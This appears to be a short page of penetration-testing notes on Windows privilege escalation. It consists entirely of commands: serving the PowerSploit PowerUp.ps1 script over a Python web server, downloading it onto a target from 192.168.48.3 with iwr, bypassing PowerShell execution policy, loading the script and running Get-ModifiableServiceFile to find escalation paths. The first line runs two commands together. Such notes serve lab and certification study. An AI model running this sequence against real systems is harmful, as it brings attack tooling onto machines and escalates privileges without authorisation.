cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 . python3 -m http.server 80
iwr -uri http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
Last updated 1 month ago